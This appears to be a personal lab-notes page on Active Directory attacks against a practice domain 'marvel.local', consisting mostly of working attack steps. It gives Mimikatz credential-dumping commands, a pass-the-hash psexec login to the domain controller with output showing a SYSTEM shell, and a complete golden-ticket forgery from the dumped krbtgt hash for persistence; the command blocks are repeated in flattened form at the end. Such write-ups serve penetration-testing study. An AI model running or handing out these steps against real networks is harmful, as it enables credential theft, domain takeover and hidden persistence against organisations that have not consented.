Golden Ticket Attacks

PRACTICE ! PRACTICE ! PRACTICE !

What is Mimikatz

A Post Exploitation tool used to view and steal credentials - generate kerberos tickets and leverage attacks

Dumps credentials stored inside the memory, Possible attacks w Mimikatz

Credential Dumping
Pass-The-Hash
Over-Pass-The-Hash
Pass-The-Ticket
Golden Ticket
Silver Ticket

Credential Dumping using Mimikatz

mimikatz# privilege::debug            // Bypass certain restrictions
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::sam
mimikatz# lsadump::sam /patch
mimikatz# lsadump::lsa /patch

Administrator's NTLM hash - 8d657f0e83858757657fc60dbf57c15d

We can now psexec into the DC using the NTLM hash, But wait psexec requires NThash and LMhash separately right ? - Idk if i'm correct but I just repeated the same NTLM hash for both and it worked :)

$ impacket-psexec marvel.local/administrator@192.168.169.147 -hashes 8d657f0e83858757657fc60dbf57c15d:8d657f0e83858757657fc60dbf57c15d
Impacket v0.10.1.dev1+20230511.22548.197c14bd - Copyright 2022 Fortra

[*] Requesting shares on 192.168.169.147.....
[*] Found writable share ADMIN$
[*] Uploading file QcqliVUn.exe
[*] Opening SVCManager on 192.168.169.147.....
[*] Creating service xkdY on 192.168.169.147.....
[*] Starting service xkdY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> echo %username%
HYDRA-DC$

Golden Ticket Attacks

This attack is mainly used for Persistance, a simple explanation would be us impersonating the default Kerberos TGT account ( krbtgt ) and generating golden tickets for the sake of Stealth :)

mimikatz# privilege::debug
mimikatz# lsadump::lsa /inject /name:krbtgt

Important things to note down

The SID => S-1-5-21-3353711819-682220578-791151302
NTLM Hash of the user krbtgt => 92c380ff77ec1e13f38a9ed5609ff591

Now let's generate some golden tickets by abusing the krbtgt account :)

mimikatz# kerberos::golden /User:fakeuser /domain:marvel.local /sid:S-1-5-21-3353711819-682220578-791151302 /krbtgt:92c380ff77ec1e13f38a9ed5609ff591 /id:500 /ptt
User      : fakeuser
Domain    : marvel.local (MARVEL)
SID       : S-1-5-21-3353711819-682220578-791151302
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 92c380ff77ec1e13f38a9ed5609ff591 - rc4_hmac_nt      
Lifetime  : 5/11/2023 5:08:54 AM ; 5/8/2033 5:08:54 AM ; 5/8/2033 5:08:54 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'fakeuser @ marvel.local' successfully submitted for current session

mimikatz# misc::cmd
Patch OK for 'cmd.exe'

Now we can open a cmd via mimikatz and execute psexe.exe file to move laterally or pivot in the network !

PreviousPrintNightmare NextZeroLogon Attacks

Last updated 1 year ago

$ impacket-psexec marvel.local/administrator@192.168.169.147 -hashes 8d657f0e83858757657fc60dbf57c15d:8d657f0e83858757657fc60dbf57c15d Impacket v0.10.1.dev1+20230511.22548.197c14bd - Copyright 2022 Fortra [*] Requesting shares on 192.168.169.147..... [*] Found writable share ADMIN$ [*] Uploading file QcqliVUn.exe [*] Opening SVCManager on 192.168.169.147..... [*] Creating service xkdY on 192.168.169.147..... [*] Starting service xkdY..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.3650] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system C:\Windows\system32> echo %username% HYDRA-DC$

mimikatz# kerberos::golden /User:fakeuser /domain:marvel.local /sid:S-1-5-21-3353711819-682220578-791151302 /krbtgt:92c380ff77ec1e13f38a9ed5609ff591 /id:500 /ptt User : fakeuser Domain : marvel.local (MARVEL) SID : S-1-5-21-3353711819-682220578-791151302 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 92c380ff77ec1e13f38a9ed5609ff591 - rc4_hmac_nt Lifetime : 5/11/2023 5:08:54 AM ; 5/8/2033 5:08:54 AM ; 5/8/2033 5:08:54 AM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'fakeuser @ marvel.local' successfully submitted for current session mimikatz# misc::cmd Patch OK for 'cmd.exe'